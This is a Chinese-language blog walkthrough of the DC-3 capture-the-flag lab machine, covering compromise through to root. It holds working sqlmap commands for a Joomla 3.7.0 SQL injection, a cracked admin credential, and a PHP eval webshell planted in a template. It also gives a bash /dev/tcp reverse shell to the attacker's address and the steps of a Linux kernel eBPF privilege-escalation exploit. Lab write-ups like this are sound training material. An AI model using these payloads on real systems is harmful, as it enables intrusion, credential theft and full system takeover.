壮心未与年俱老,死去犹能作鬼雄。这篇文章主要讲述靶机DC-3相关的知识,希望能为你提供帮助。
DC3靶机地址:http://www.five86.com
探测出靶机ip后扫描靶机的信息
文章图片
访问80端口,这次只有一个flag
文章图片
使用kali自带的joomscan扫描下
好吧不是自带的,https://github.com/OWASP/joomscan
下载zip文件
unzip joomscan-master.zip
cd joomscan-master
perl joomscan.pl
perl joomscan.pl -u 192.168.32.131查了下joomlascan3.7版本有sql注入的漏洞
文章图片
搜索下这个joomla这个版本的漏洞
searchsploit joomla | grep 3.7.0
文章图片
然后去访问php/webapps/42033.txt文件
文件里给我们提供了sqlmap的参数,肥肠好用,默默关掉了msf...
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
文章图片
使用sqlmap跑下,跑出来几个数据库名
sqlmap -u "http://192.168.32.131/index.php?option=com_fields&
view=fields&
layout=modal&
list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
文章图片
跑下表名,还挺多的,可以重点关注下mysql跟joomladb的表
sqlmap -u "http://192.168.32.131/index.php?option=com_fields&
view=fields&
layout=modal&
list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables--tables 列出数据库中的表
文章图片
试了会儿发现mysql表没啥东西,直接干joomladb就可以了
发现有username和password
sqlmap -u "http://192.168.32.131/index.php?option=com_fields&
view=fields&
layout=modal&
list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns-D "joomladb" -T "#__users"--columns 列出字段
-D 指定数据库名
-T 指定表名
文章图片
看下字段里的内容
sqlmap -u "http://192.168.32.131/index.php?option=com_fields&
view=fields&
layout=modal&
list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dump -D "joomladb" -T "#__users" -C "username,password"
文章图片
hashid识别下加密类型,为bcrypt
文章图片
使用hashcat解密
先hashcat --help看下加密类型的编号
grep再筛选下,为3200
文章图片
文章图片
知道加密类型的编码后开始破解
输入下列指令后发生报错,查了下需要写到文件里,且不能有空格
https://stackoverflow.com/questions/50198565/hashcat-bcrypt-2-blowfish-unix-line-length-exception/50200893
hashcat -m 3200$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
文章图片
发现跑不出来密码,查了下要加字典的
文章图片
算了,用john破解吧,很快嗷,加密类型跟解密结果都出来了
文章图片
登陆admin/snoopy
不要登陆首页的那个嗷,登陆joomscan扫出来的管理界面 xxx/administrator
文章图片
文章图片
然后到模板,写入一句话
文章图片
文章图片
然后使用webshell工具进行连接
http://192.168.32.131/templates/protostar/html/test.php
但是发现没什么权限,但是有修改文件的权限,可以把我们的一句话改下弹到kali上
<
?php@eval($_POST[cmd]);
system("bash -c \'bash -i >
&
/dev/tcp/192.168.32.128/6666 0>
&
1\'");
?>
文章图片
文章图片
开启监听后浏览器访问test.php后连接成功,查看下系统版本
文章图片
搜索相关漏洞
Linux Kernel 4.4.x (Ubuntu 16.04) - \'double-fdput()\' bpf(BPF_PROG_LOAD) Privilege Escalation
提权参考:https://blog.csdn.net/nzjdsds/article/details/115519245
文章图片
查看该漏洞的文档,下载exp
文章图片
下载好后通过蚁剑上传到靶机,注意上传的路径
文章图片
然后在上传位置解压后
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
...
we have root privs now... #可以开始输入指令了
文章图片
【靶机DC-3】在root目录下找到flag
文章图片
推荐阅读
- Nginx概述,搭建,配置实践总结
- 使用DockerNginx和Jenkins实现前端自动化部署
- 使用PetitPotam代替Printerbug
- LVS&Keepalived—集群负载均衡企业高可用详解
- 保护亿万数据安全,Spring有“声明式事务”绝招
- 分布式ID生成服务,推荐大家搞一个太香了
- 分布式技术带你分析认识缓存穿透/雪崩/击穿
- 如果云是水滴,Kubernetes就是水滴管理平台
- 如何选择最佳的Node.js框架(Express.js,Koa.js或Sails.js)